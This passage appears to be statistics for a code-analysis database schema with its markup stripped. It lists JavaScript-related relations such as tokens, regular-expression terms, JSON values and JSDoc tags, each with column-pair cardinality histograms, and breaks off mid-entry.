+ + +1 +11 +441 + + +11 +21 +427 + + +21 +30 +414 + + +30 +40 +452 + + +40 +51 +435 + + +51 +64 +413 + + +64 +79 +404 + + +79 +96 +401 + + +96 +121 +400 + + +121 +158 +401 + + +158 +220 +399 + + +220 +387 +401 + + +388 +60934 +324 + + + + + + +toplevel +terminator + + +12 + + +1 +2 +5046 + + +2 +6 +266 + + + + + + +text +id + + +12 + + +1 +2 +513961 + + +2 +3 +84265 + + +3 +49 +48993 + + +49 +175121 +903 + + + + + + +text +toplevel + + +12 + + +1 +2 +569267 + + +2 +3 +56143 + + +3 +5068 +22712 + + + + + + +text +terminator + + +12 + + +1 +2 +647931 + + +2 +4 +191 + + + + + + +terminator +id + + +12 + + +3 +4 +3 + + +349 +350 +1 + 
+ +1830 +1831 +1 + + +1619996 +1619997 +1 + + + + + + +terminator +toplevel + + +12 + + +3 +4 +3 + + +11 +12 +1 + + +349 +350 +1 + + +5218 +5219 +1 + + + + + + +terminator +text + + +12 + + +1 +2 +3 + + +110 +111 +1 + + +1093 +1094 +1 + + +647111 +647112 +1 + + + + + + + + +indentation +1145010 + + +file +5728 + + +lineno +40788 + + +indentChar +2 + + +indentDepth +72 + + + + +file +lineno + + +12 + + +1 +9 +440 + + +9 +18 +471 + + +18 +29 +439 + + +29 +41 +451 + + +41 +54 +460 + + +54 +71 +442 + + +71 +91 +441 + + +91 +118 +430 + + +118 +152 +432 + + +152 +205 +434 + + +205 +295 +431 + + +295 +503 +430 + + +503 +38151 +427 + + + + + + +file +indentChar + + +12 + + +1 +2 +5692 + + +2 +3 +36 + + + + + + +file +indentDepth + + +12 + + +1 +2 +287 + + +2 +3 +401 + + +3 +4 +665 + + +4 +5 +815 + + +5 +6 +814 + + +6 +7 +687 + + +7 +8 +567 + + +8 +9 +390 + + +9 +11 +503 + + +11 +17 +462 + + +17 +67 +137 + + + + + + +lineno +file + + +12 + + +1 +2 +10935 + + +2 +3 +5303 + + +3 +4 +12061 + + +4 +6 +3644 + + +6 +13 +3223 + + +13 +31 +3090 + + +31 +3986 +2532 + + + + + + +lineno +indentChar + + +12 + + +1 +2 +38720 + + +2 +3 +2068 + + + + + + +lineno +indentDepth + + +12 + + +1 +2 +11626 + + +2 +3 +7847 + + +3 +4 +10434 + + +4 +5 +2688 + + +5 +8 +3316 + + +8 +13 +3144 + + +13 +39 +1733 + + + + + + +indentChar +file + + +12 + + +42 +43 +1 + + +5722 +5723 +1 + + + + + + +indentChar +lineno + + +12 + + +2068 +2069 +1 + + +40788 +40789 +1 + + + + + + +indentChar +indentDepth + + +12 + + +10 +11 +1 + + +72 +73 +1 + + + + + + +indentDepth +file + + +12 + + +1 +6 +6 + + +6 +9 +6 + + +9 +20 +6 + + +21 +30 +6 + + +38 +57 +6 + + +59 +90 +6 + + +90 +124 +6 + + +132 +160 +6 + + +165 +211 +6 + + +213 +337 +6 + + +377 +1532 +6 + + +1919 +5487 +6 + + + + + + +indentDepth +lineno + + +12 + + +2 +8 +6 + + +11 +19 +6 + + +25 +44 +6 + + +53 +67 +6 + + +67 +89 +6 + + +102 +169 +6 + + +183 +239 +6 + + +269 +411 +6 + + +417 +971 +6 + + +1129 +2732 +6 + + +4374 +9301 +6 + + +11828 +21226 +6 + + + + 
+ + +indentDepth +indentChar + + +12 + + +1 +2 +62 + + +2 +3 +10 + + + + + + + + +js_parse_errors +3 + + +id +3 + + +toplevel +3 + + +message +1 + + +line +3 + + + + +id +toplevel + + +12 + + +1 +2 +3 + + + + + + +id +message + + +12 + + +1 +2 +3 + + + + + + +id +line + + +12 + + +1 +2 +3 + + + + + + +toplevel +id + + +12 + + +1 +2 +3 + + + + + + +toplevel +message + + +12 + + +1 +2 +3 + + + + + + +toplevel +line + + +12 + + +1 +2 +3 + + + + + + +message +id + + +12 + + +3 +4 +1 + + + + + + +message +toplevel + + +12 + + +3 +4 +1 + + + + + + +message +line + + +12 + + +3 +4 +1 + + + + + + +line +id + + +12 + + +1 +2 +3 + + + + + + +line +toplevel + + +12 + + +1 +2 +3 + + + + + + +line +message + + +12 + + +1 +2 +3 + + + + + + + + +regexpterm +id +33197 + + +id +33197 + + +kind +25 + + +parent +13313 + + +idx +76 + + +tostring +4610 + + + + +id +kind + + +12 + + +1 +2 +33197 + + + + + + +id +parent + + +12 + + +1 +2 +33197 + + + + + + +id +idx + + +12 + + +1 +2 +33197 + + + + + + +id +tostring + + +12 + + +1 +2 +33197 + + + + + + +kind +id + + +12 + + +1 +4 +2 + + +7 +12 +2 + + +12 +16 +2 + + +59 +100 +2 + + +146 +265 +2 + + +445 +479 +2 + + +599 +620 +2 + + +637 +642 +2 + + +826 +1058 +2 + + +1067 +1474 +2 + + +1573 +1693 +2 + + +2613 +3372 +2 + + +15489 +15490 +1 + + + + + + +kind +parent + + +12 + + +1 +4 +2 + + +7 +8 +1 + + +11 +12 +2 + + +15 +46 +2 + + +79 +132 +2 + + +132 +331 +2 + + +367 +381 +2 + + +437 +638 +2 + + +641 +737 +2 + + +825 +1005 +2 + + +1391 +1403 +2 + + +1465 +1645 +2 + + +2691 +3963 +2 + + + + + + +kind +idx + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +3 + + +6 +8 +2 + + +12 +15 +2 + + +17 +19 +2 + + +19 +21 +2 + + +22 +23 +1 + + +23 +24 +2 + + +25 +27 +2 + + +27 +30 +2 + + +42 +49 +2 + + +73 +74 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +6 + + +2 +5 +2 + + +6 +11 +2 + + +13 +28 +2 + + +31 +59 +2 + + +65 +78 +2 + + +100 +118 +2 + + +149 +171 +2 + + +175 +391 +2 + + +433 +791 +2 + + +1992 +1993 +1 + + + + + + +parent +id + + +12 + + +1 
+2 +7691 + + +2 +3 +2568 + + +3 +4 +924 + + +4 +7 +1189 + + +7 +77 +941 + + + + + + +parent +kind + + +12 + + +1 +2 +10080 + + +2 +3 +2026 + + +3 +5 +1068 + + +5 +9 +139 + + + + + + +parent +idx + + +12 + + +1 +2 +7691 + + +2 +3 +2568 + + +3 +4 +924 + + +4 +7 +1189 + + +7 +77 +941 + + + + + + +parent +tostring + + +12 + + +1 +2 +7733 + + +2 +3 +2644 + + +3 +4 +940 + + +4 +7 +1230 + + +7 +32 +766 + + + + + + +idx +id + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +4 +8 +7 + + +8 +13 +7 + + +15 +22 +6 + + +26 +35 +5 + + +37 +51 +6 + + +53 +75 +6 + + +79 +141 +6 + + +186 +325 +6 + + +385 +1182 +6 + + +1578 +13314 +5 + + + + + + +idx +kind + + +12 + + +1 +2 +18 + + +2 +3 +15 + + +3 +4 +8 + + +4 +5 +7 + + +5 +8 +6 + + +9 +13 +6 + + +13 +16 +7 + + +17 +20 +7 + + +21 +25 +2 + + + + + + +idx +parent + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +4 +8 +7 + + +8 +13 +7 + + +15 +22 +6 + + +26 +35 +5 + + +37 +51 +6 + + +53 +75 +6 + + +79 +141 +6 + + +186 +325 +6 + + +385 +1182 +6 + + +1578 +13314 +5 + + + + + + +idx +tostring + + +12 + + +1 +2 +8 + + +2 +3 +8 + + +3 +4 +4 + + +5 +7 +6 + + +7 +10 +6 + + +10 +15 +6 + + +16 +21 +7 + + +21 +26 +6 + + +29 +48 +6 + + +48 +75 +6 + + +82 +147 +6 + + +158 +940 +6 + + +3258 +3259 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +3026 + + +2 +3 +751 + + +3 +5 +391 + + +5 +49 +346 + + +49 +1013 +96 + + + + + + +tostring +kind + + +12 + + +1 +2 +4605 + + +2 +3 +5 + + + + + + +tostring +parent + + +12 + + +1 +2 +3041 + + +2 +3 +746 + + +3 +5 +389 + + +5 +53 +346 + + +54 +875 +88 + + + + + + +tostring +idx + + +12 + + +1 +2 +4102 + + +2 +5 +351 + + +5 +58 +157 + + + + + + + + +regexp_parse_errors +id +122 + + +id +122 + + +regexp +41 + + +message +5 + + + + +id +regexp + + +12 + + +1 +2 +122 + + + + + + +id +message + + +12 + + +1 +2 +122 + + + + + + +regexp +id + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +3 +4 +12 + + +4 +5 +5 + + +5 +6 +7 + + +6 +7 +1 + + + + + + +regexp +message + + +12 + + +1 +2 +18 + + +2 +3 +4 + + +3 +4 +19 + + + + + + +message +id + + +12 + + 
+1 +2 +1 + + +8 +9 +1 + + +22 +23 +1 + + +23 +24 +1 + + +68 +69 +1 + + + + + + +message +regexp + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +22 +23 +1 + + +23 +24 +1 + + +35 +36 +1 + + + + + + + + +is_greedy +2629 + + +id +2629 + + + + + +isOptionalChaining +100 + + +id +100 + + + + + + +range_quantifier_lower_bound +146 + + +id +146 + + +lo +11 + + + + +id +lo + + +12 + + +1 +2 +146 + + + + + + +lo +id + + +12 + + +1 +2 +4 + + +4 +5 +1 + + +5 +6 +1 + + +17 +18 +1 + + +20 +21 +1 + + +28 +29 +1 + + +33 +34 +1 + + +35 +36 +1 + + + + + + + + +range_quantifier_upper_bound +45 + + +id +45 + + +hi +13 + + + + +id +hi + + +12 + + +1 +2 +45 + + + + + + +hi +id + + +12 + + +1 +2 +5 + + +2 +3 +3 + + +3 +4 +2 + + +8 +9 +1 + + +9 +10 +1 + + +11 +12 +1 + + + + + + + + +is_capture +1280 + + +id +1280 + + +number +14 + + + + +id +number + + +12 + + +1 +2 +1280 + + + + + + +number +id + + +12 + + +1 +2 +1 + + +2 +3 +2 + + +4 +5 +2 + + +6 +7 +2 + + +7 +8 +1 + + +12 +13 +1 + + +23 +24 +1 + + +55 +56 +1 + + +108 +109 +1 + + +276 +277 +1 + + +774 +775 +1 + + + + + + + + +is_named_capture +1280 + + +id +1280 + + +name +14 + + + + +id +name + + +12 + + +1 +2 +1280 + + + + + + +name +id + + +12 + + +1 +2 +1 + + +2 +3 +2 + + +4 +5 +2 + + +6 +7 +2 + + +7 +8 +1 + + +12 +13 +1 + + +23 +24 +1 + + +55 +56 +1 + + +108 +109 +1 + + +276 +277 +1 + + +774 +775 +1 + + + + + + + + +is_inverted +458 + + +id +458 + + + + + +regexp_const_value +19032 + + +id +19032 + + +value +237 + + + + +id +value + + +12 + + +1 +2 +19032 + + + + + + +value +id + + +12 + + +1 +2 +80 + + +2 +3 +12 + + +3 +4 +10 + + +4 +5 +20 + + +5 +17 +18 + + +17 +30 +18 + + +30 +66 +18 + + +68 +143 +18 + + +155 +242 +18 + + +251 +555 +18 + + +581 +1013 +7 + + + + + + + + +char_class_escape +1573 + + +id +1573 + + +value +6 + + + + +id +value + + +12 + + +1 +2 +1573 + + + + + + +value +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +unicode_property_escapename +1573 
+ + +id +1573 + + +name +6 + + + + +id +name + + +12 + + +1 +2 +1573 + + + + + + +name +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +unicode_property_escapevalue +1573 + + +id +1573 + + +value +6 + + + + +id +value + + +12 + + +1 +2 +1573 + + + + + + +value +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +backref +11 + + +id +11 + + +value +4 + + + + +id +value + + +12 + + +1 +2 +11 + + + + + + +value +id + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +6 +7 +1 + + + + + + + + +named_backref +11 + + +id +11 + + +name +4 + + + + +id +name + + +12 + + +1 +2 +11 + + + + + + +name +id + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +6 +7 +1 + + + + + + + + +tokeninfo +id +8770869 + + +id +8770869 + + +kind +9 + + +toplevel +5312 + + +idx +1581031 + + +value +234179 + + + + +id +kind + + +12 + + +1 +2 +8770869 + + + + + + +id +toplevel + + +12 + + +1 +2 +8770869 + + + + + + +id +idx + + +12 + + +1 +2 +8770869 + + + + + + +id +value + + +12 + + +1 +2 +8770869 + + + + + + +kind +id + + +12 + + +2773 +2774 +1 + + +5312 +5313 +1 + + +15526 +15527 +1 + + +31654 +31655 +1 + + +269555 +269556 +1 + + +551767 +551768 +1 + + +557620 +557621 +1 + + +2268328 +2268329 +1 + + +5068334 +5068335 +1 + + + + + + +kind +toplevel + + +12 + + +471 +472 +1 + + +2204 +2205 +1 + + +2851 +2852 +1 + + +3204 +3205 +1 + + +5089 +5090 +1 + + +5219 +5220 +1 + + +5294 +5295 +1 + + +5300 +5301 +1 + + +5312 +5313 +1 + + + + + + +kind +idx + + +12 + + +1949 +1950 +1 + + +2130 +2131 +1 + + +8409 +8410 +1 + + +12883 +12884 +1 + + +51181 +51182 +1 + + +130388 +130389 +1 + + +409369 +409370 +1 + + +583910 +583911 +1 + + +1104589 +1104590 +1 + + + + + + +kind +value + + +12 + + +1 +2 +2 + + +2 +3 +1 + + +34 +35 +1 + + +52 +53 +1 + + +1596 +1597 +1 + + +59827 +59828 +1 + + +85214 +85215 +1 + + +87463 +87464 +1 + + + + + + +toplevel +id + + +12 + + +1 +45 +403 + + +45 +95 +408 
+ + +95 +149 +399 + + +149 +212 +408 + + +212 +291 +405 + + +291 +362 +399 + + +362 +461 +401 + + +461 +585 +399 + + +585 +756 +399 + + +756 +1013 +399 + + +1013 +1389 +399 + + +1389 +2313 +400 + + +2320 +6681 +399 + + +6717 +1581032 +94 + + + + + + +toplevel +kind + + +12 + + +1 +5 +174 + + +5 +6 +1046 + + +6 +7 +1326 + + +7 +8 +1279 + + +8 +9 +1214 + + +9 +10 +273 + + + + + + +toplevel +idx + + +12 + + +1 +45 +403 + + +45 +95 +408 + + +95 +149 +399 + + +149 +212 +408 + + +212 +291 +405 + + +291 +362 +399 + + +362 +461 +401 + + +461 +585 +399 + + +585 +756 +399 + + +756 +1013 +399 + + +1013 +1389 +399 + + +1389 +2313 +400 + + +2320 +6681 +399 + + +6717 +1581032 +94 + + + + + + +toplevel +value + + +12 + + +1 +21 +423 + + +21 +33 +416 + + +33 +44 +424 + + +44 +55 +400 + + +55 +65 +426 + + +65 +76 +407 + + +76 +88 +426 + + +88 +102 +402 + + +102 +120 +405 + + +120 +144 +401 + + +144 +180 +400 + + +180 +260 +400 + + +260 +46630 +382 + + + + + + +idx +id + + +12 + + +1 +2 +1083847 + + +2 +3 +166188 + + +3 +6 +136823 + + +6 +9 +123495 + + +9 +5313 +70678 + + + + + + +idx +kind + + +12 + + +1 +2 +1175018 + + +2 +3 +207984 + + +3 +4 +120754 + + +4 +10 +77275 + + + + + + +idx +toplevel + + +12 + + +1 +2 +1083847 + + +2 +3 +166188 + + +3 +6 +136823 + + +6 +9 +123495 + + +9 +5313 +70678 + + + + + + +idx +value + + +12 + + +1 +2 +1089271 + + +2 +3 +165753 + + +3 +5 +104658 + + +5 +8 +145624 + + +8 +1449 +75725 + + + + + + +value +id + + +12 + + +1 +2 +104636 + + +2 +3 +47235 + + +3 +4 +20077 + + +4 +5 +16835 + + +5 +9 +19608 + + +9 +34 +17687 + + +34 +789848 +8101 + + + + + + +value +kind + + +12 + + +1 +2 +234168 + + +2 +3 +11 + + + + + + +value +toplevel + + +12 + + +1 +2 +174552 + + +2 +3 +34819 + + +3 +8 +18537 + + +8 +5313 +6271 + + + + + + +value +idx + + +12 + + +1 +2 +105969 + + +2 +3 +47057 + + +3 +4 +19986 + + +4 +5 +16682 + + +5 +9 +19402 + + +9 +36 +17686 + + +36 +347359 +7397 + + + + + + + + +next_token +104943 + + +comment +104943 + + +token +74457 + + + + 
+comment +token + + +12 + + +1 +2 +104943 + + + + + + +token +comment + + +12 + + +1 +2 +59983 + + +2 +3 +8628 + + +3 +12 +5601 + + +12 +141 +245 + + + + + + + + +json +id +1643352 + + +id +1643352 + + +kind +6 + + +parent +617634 + + +idx +159429 + + +tostring +768907 + + + + +id +kind + + +12 + + +1 +2 +1643352 + + + + + + +id +parent + + +12 + + +1 +2 +1643352 + + + + + + +id +idx + + +12 + + +1 +2 +1643352 + + + + + + +id +tostring + + +12 + + +1 +2 +1643352 + + + + + + +kind +id + + +12 + + +24 +25 +1 + + +654 +655 +1 + + +175925 +175926 +1 + + +273113 +273114 +1 + + +441281 +441282 +1 + + +752355 +752356 +1 + + + + + + +kind +parent + + +12 + + +17 +18 +1 + + +411 +412 +1 + + +165183 +165184 +1 + + +167132 +167133 +1 + + +271547 +271548 +1 + + +452264 +452265 +1 + + + + + + +kind +idx + + +12 + + +10 +11 +1 + + +65 +66 +1 + + +152 +153 +1 + + +174 +175 +1 + + +198 +199 +1 + + +159429 +159430 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +2865 +2866 +1 + + +100735 +100736 +1 + + +271467 +271468 +1 + + +393837 +393838 +1 + + + + + + +parent +id + + +12 + + +1 +2 +127476 + + +2 +3 +184044 + + +3 +4 +285109 + + +4 +159430 +21005 + + + + + + +parent +kind + + +12 + + +1 +2 +179808 + + +2 +3 +437119 + + +3 +7 +707 + + + + + + +parent +idx + + +12 + + +1 +2 +127476 + + +2 +3 +184044 + + +3 +4 +285109 + + +4 +159430 +21005 + + + + + + +parent +tostring + + +12 + + +1 +2 +173483 + + +2 +3 +197229 + + +3 +4 +240036 + + +4 +135127 +6886 + + + + + + +idx +id + + +12 + + +1 +2 +158929 + + +3 +617635 +500 + + + + + + +idx +kind + + +12 + + +1 +2 +159178 + + +2 +7 +251 + + + + + + +idx +parent + + +12 + + +1 +2 +158929 + + +3 +617635 +500 + + + + + + +idx +tostring + + +12 + + +1 +2 +158929 + + +2 +429145 +500 + + + + + + +tostring +id + + +12 + + +1 +2 +511110 + + +2 +3 +165121 + + +3 +6 +69702 + + +6 +63547 +22974 + + + + + + +tostring +kind + + +12 + + +1 +2 +768907 + + + + + + +tostring +parent + + +12 + + +1 +2 +562365 + + +2 +3 +144455 + + +3 
+10 +58431 + + +10 +63547 +3656 + + + + + + +tostring +idx + + +12 + + +1 +2 +554379 + + +2 +3 +185366 + + +3 +720 +29162 + + + + + + + + +json_literals +1026146 + + +value +397229 + + +raw +397431 + + +expr +1026146 + + + + +value +raw + + +12 + + +1 +2 +397027 + + +2 +3 +202 + + + + + + +value +expr + + +12 + + +1 +2 +216149 + + +2 +3 +128106 + + +3 +5 +28217 + + +5 +63547 +24757 + + + + + + +raw +value + + +12 + + +1 +2 +397431 + + + + + + +raw +expr + + +12 + + +1 +2 +216237 + + +2 +3 +128277 + + +3 +5 +28205 + + +5 +63547 +24712 + + + + + + +expr +value + + +12 + + +1 +2 +1026146 + + + + + + +expr +raw + + +12 + + +1 +2 +1026146 + + + + + + + + +json_properties +1186648 + + +obj +441238 + + +property +2285 + + +value +1186648 + + + + +obj +property + + +12 + + +1 +2 +685 + + +2 +3 +161803 + + +3 +4 +272428 + + +4 +252 +6322 + + + + + + +obj +value + + +12 + + +1 +2 +685 + + +2 +3 +161803 + + +3 +4 +272428 + + +4 +252 +6322 + + + + + + +property +obj + + +12 + + +1 +2 +1378 + + +2 +3 +371 + + +3 +4 +199 + + +4 +17 +174 + + +18 +429290 +163 + + + + + + +property +value + + +12 + + +1 +2 +1378 + + +2 +3 +371 + + +3 +4 +199 + + +4 +17 +174 + + +18 +429290 +163 + + + + + + +value +obj + + +12 + + +1 +2 +1186648 + + + + + + +value +property + + +12 + + +1 +2 +1186648 + + + + + + + + +json_errors +id +1 + + +id +1 + + +message +1 + + + + +id +message + + +12 + + +1 +2 +1 + + + + + + +message +id + + +12 + + +1 +2 +1 + + + + + + + + +json_locations +712 + + +locatable +712 + + +location +712 + + + + +locatable +location + + +12 + + +1 +2 +712 + + + + + + +location +locatable + + +12 + + +1 +2 +712 + + + + + + + + +hasLocation +19213780 + + +locatable +19213780 + + +location +15664049 + + + + +locatable +location + + +12 + + +1 +2 +19213780 + + + + + + +location +locatable + + +12 + + +1 +2 +12144311 + + +2 +3 +3490097 + + +3 +6 +29641 + + + + + + + + +entry_cfg_node +id +121542 + + +id +121542 + + +container +121542 + + + + +id +container + + +12 + + +1 +2 +121542 + + 
+ + + + +container +id + + +12 + + +1 +2 +121542 + + + + + + + + +exit_cfg_node +id +121542 + + +id +121542 + + +container +121542 + + + + +id +container + + +12 + + +1 +2 +121542 + + + + + + +container +id + + +12 + + +1 +2 +121542 + + + + + + + + +guard_node +177785 + + +id +177785 + + +kind +2 + + +test +91338 + + + + +id +kind + + +12 + + +1 +2 +177785 + + + + + + +id +test + + +12 + + +1 +2 +177785 + + + + + + +kind +id + + +12 + + +86336 +86337 +1 + + +91449 +91450 +1 + + + + + + +kind +test + + +12 + + +82430 +82431 +1 + + +89999 +90000 +1 + + + + + + +test +id + + +12 + + +1 +2 +10245 + + +2 +3 +76994 + + +3 +21 +4099 + + + + + + +test +kind + + +12 + + +1 +2 +10247 + + +2 +3 +81091 + + + + + + + + +successor +6873752 + + +pred +6717415 + + +succ +6718602 + + + + +pred +succ + + +12 + + +1 +2 +6588118 + + +2 +21 +129297 + + + + + + +succ +pred + + +12 + + +1 +2 +6617438 + + +2 +253 +101164 + + + + + + + + +jsdoc +id +19270 + + +id +19270 + + +description +9383 + + +comment +19270 + + + + +id +description + + +12 + + +1 +2 +19270 + + + + + + +id +comment + + +12 + + +1 +2 +19270 + + + + + + +description +id + + +12 + + +1 +2 +7588 + + +2 +3 +1387 + + +3 +5727 +408 + + + + + + +description +comment + + +12 + + +1 +2 +7588 + + +2 +3 +1387 + + +3 +5727 +408 + + + + + + +comment +id + + +12 + + +1 +2 +19270 + + + + + + +comment +description + + +12 + + +1 +2 +19270 + + + + + + + + +jsdoc_tags +id +29323 + + +id +29323 + + +title +92 + + +parent +14226 + + +idx +66 + + +tostring +92 + + + + +id +title + + +12 + + +1 +2 +29323 + + + + + + +id +parent + + +12 + + +1 +2 +29323 + + + + + + +id +idx + + +12 + + +1 +2 +29323 + + + + + + +id +tostring + + +12 + + +1 +2 +29323 + + + + + + +title +id + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +5 +7 + + +5 +7 +8 + + +8 +12 +7 + + +13 +17 +7 + + +20 +35 +7 + + +40 +55 +7 + + +58 +111 +7 + + +114 +167 +8 + + +170 +331 +7 + + +587 +913 +7 + + +2221 +10284 +4 + + + + + + +title +parent + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 
+4 +5 + + +4 +6 +7 + + +6 +10 +8 + + +10 +16 +7 + + +16 +26 +7 + + +26 +36 +7 + + +38 +67 +7 + + +68 +111 +7 + + +137 +213 +7 + + +232 +702 +7 + + +870 +6020 +7 + + + + + + +title +idx + + +12 + + +1 +2 +35 + + +2 +3 +8 + + +3 +4 +7 + + +4 +5 +8 + + +5 +6 +8 + + +6 +7 +5 + + +7 +8 +4 + + +8 +10 +8 + + +10 +31 +7 + + +46 +59 +2 + + + + + + +title +tostring + + +12 + + +1 +2 +92 + + + + + + +parent +id + + +12 + + +1 +2 +6064 + + +2 +3 +4452 + + +3 +4 +2064 + + +4 +5 +913 + + +5 +67 +733 + + + + + + +parent +title + + +12 + + +1 +2 +6972 + + +2 +3 +4911 + + +3 +4 +1793 + + +4 +8 +550 + + + + + + +parent +idx + + +12 + + +1 +2 +6064 + + +2 +3 +4452 + + +3 +4 +2064 + + +4 +5 +913 + + +5 +67 +733 + + + + + + +parent +tostring + + +12 + + +1 +2 +6972 + + +2 +3 +4911 + + +3 +4 +1793 + + +4 +8 +550 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +2 +3 +29 + + +3 +4 +6 + + +4 +5 +5 + + +5 +6 +6 + + +7 +11 +5 + + +11 +53 +5 + + +89 +1647 +5 + + +3710 +14227 +3 + + + + + + +idx +title + + +12 + + +1 +2 +9 + + +2 +3 +31 + + +3 +4 +9 + + +4 +6 +6 + + +8 +21 +5 + + +29 +61 +5 + + +70 +71 +1 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +2 +3 +29 + + +3 +4 +6 + + +4 +5 +5 + + +5 +6 +6 + + +7 +11 +5 + + +11 +53 +5 + + +89 +1647 +5 + + +3710 +14227 +3 + + + + + + +idx +tostring + + +12 + + +1 +2 +9 + + +2 +3 +31 + + +3 +4 +9 + + +4 +6 +6 + + +8 +21 +5 + + +29 +61 +5 + + +70 +71 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +5 +7 + + +5 +7 +8 + + +8 +12 +7 + + +13 +17 +7 + + +20 +35 +7 + + +40 +55 +7 + + +58 +111 +7 + + +114 +167 +8 + + +170 +331 +7 + + +587 +913 +7 + + +2221 +10284 +4 + + + + + + +tostring +title + + +12 + + +1 +2 +92 + + + + + + +tostring +parent + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +5 + + +4 +6 +7 + + +6 +10 +8 + + +10 +16 +7 + + +16 +26 +7 + + +26 +36 +7 + + +38 +67 +7 + + +68 +111 +7 + + +137 +213 +7 + + +232 +702 +7 + + +870 +6020 +7 + + + + + + +tostring +idx + + +12 + + +1 +2 +35 + + +2 +3 +8 + + +3 +4 +7 + + +4 +5 +8 + + 
+5 +6 +8 + + +6 +7 +5 + + +7 +8 +4 + + +8 +10 +8 + + +10 +31 +7 + + +46 +59 +2 + + + + + + + + +jsdoc_tag_descriptions +13676 + + +tag +13676 + + +text +7866 + + + + +tag +text + + +12 + + +1 +2 +13676 + + + + + + +text +tag + + +12 + + +1 +2 +6089 + + +2 +3 +1025 + + +3 +8 +596 + + +8 +459 +156 + + + + + + + + +jsdoc_tag_names +11506 + + +tag +11506 + + +text +2647 + + + + +tag +text + + +12 + + +1 +2 +11506 + + + + + + +text +tag + + +12 + + +1 +2 +1398 + + +2 +3 +569 + + +3 +4 +201 + + +4 +7 +208 + + +7 +24 +200 + + +24 +498 +71 + + + + + + + + +jsdoc_type_exprs +id +22481 + + +id +22481 + + +kind +15 + + +parent +21039 + + +idx +17 + + +tostring +1447 + + + + +id +kind + + +12 + + +1 +2 +22481 + + + + + + +id +parent + + +12 + + +1 +2 +22481 + + + + + + +id +idx + + +12 + + +1 +2 +22481 + + + + + + +id +tostring + + +12 + + +1 +2 +22481 + + + + + + +kind +id + + +12 + + +8 +9 +1 + + +19 +20 +1 + + +27 +28 +1 + + +35 +36 +1 + + +55 +56 +1 + + +91 +92 +1 + + +287 +288 +1 + + +292 +293 +1 + + +303 +304 +1 + + +310 +311 +1 + + +316 +317 +1 + + +536 +537 +1 + + +668 +669 +1 + + +895 +896 +1 + + +18639 +18640 +1 + + + + + + +kind +parent + + +12 + + +8 +9 +1 + + +19 +20 +1 + + +23 +24 +1 + + +35 +36 +1 + + +55 +56 +1 + + +90 +91 +1 + + +287 +288 +2 + + +301 +302 +1 + + +310 +311 +1 + + +314 +315 +1 + + +524 +525 +1 + + +583 +584 +1 + + +890 +891 +1 + + +17717 +17718 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +3 + + +2 +3 +2 + + +3 +4 +5 + + +4 +5 +2 + + +5 +6 +1 + + +13 +14 +1 + + +16 +17 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +5 +6 +1 + + +6 +7 +1 + + +51 +52 +1 + + +57 +58 +1 + + +86 +87 +1 + + +89 +90 +1 + + +104 +105 +1 + + +155 +156 +1 + + +194 +195 +1 + + +696 +697 +1 + + + + + + +parent +id + + +12 + + +1 +2 +19985 + + +2 +16 +1054 + + + + + + +parent +kind + + +12 + + +1 +2 +20644 + + +2 +4 +395 + + + + + + +parent +idx + + +12 + + +1 +2 +19985 + + +2 +16 +1054 + + + + + + +parent +tostring + + +12 + + +1 +2 +19997 + + +2 +7 +1042 + + + + + 
+ +idx +id + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +11 +12 +1 + + +23 +24 +1 + + +32 +33 +1 + + +93 +94 +1 + + +165 +166 +1 + + +340 +341 +1 + + +750 +751 +1 + + +21021 +21022 +1 + + + + + + +idx +kind + + +12 + + +1 +2 +5 + + +2 +3 +7 + + +5 +6 +1 + + +6 +7 +1 + + +10 +11 +1 + + +11 +12 +1 + + +13 +14 +1 + + + + + + +idx +parent + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +11 +12 +1 + + +23 +24 +1 + + +32 +33 +1 + + +93 +94 +1 + + +165 +166 +1 + + +340 +341 +1 + + +750 +751 +1 + + +21021 +21022 +1 + + + + + + +idx +tostring + + +12 + + +2 +3 +2 + + +3 +4 +3 + + +4 +5 +3 + + +5 +6 +1 + + +6 +7 +1 + + +11 +12 +1 + + +17 +18 +1 + + +21 +22 +1 + + +23 +24 +1 + + +42 +43 +1 + + +103 +104 +1 + + +1378 +1379 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +713 + + +2 +3 +271 + + +3 +4 +105 + + +4 +6 +110 + + +6 +12 +111 + + +12 +77 +109 + + +77 +2754 +28 + + + + + + +tostring +kind + + +12 + + +1 +2 +1446 + + +2 +3 +1 + + + + + + +tostring +parent + + +12 + + +1 +2 +713 + + +2 +3 +271 + + +3 +4 +105 + + +4 +6 +110 + + +6 +12 +112 + + +12 +78 +110 + + +78 +2747 +26 + + + + + + +tostring +idx + + +12 + + +1 +2 +1356 + + +2 +15 +91 + + + + + + + + +jsdoc_record_field_name +241 + + +id +90 + + +idx +15 + + +name +123 + + + + +id +idx + + +12 + + +1 +2 +47 + + +2 +3 +19 + + +3 +4 +8 + + +4 +7 +8 + + +7 +16 +8 + + + + + + +id +name + + +12 + + +1 +2 +47 + + +2 +3 +19 + + +3 +4 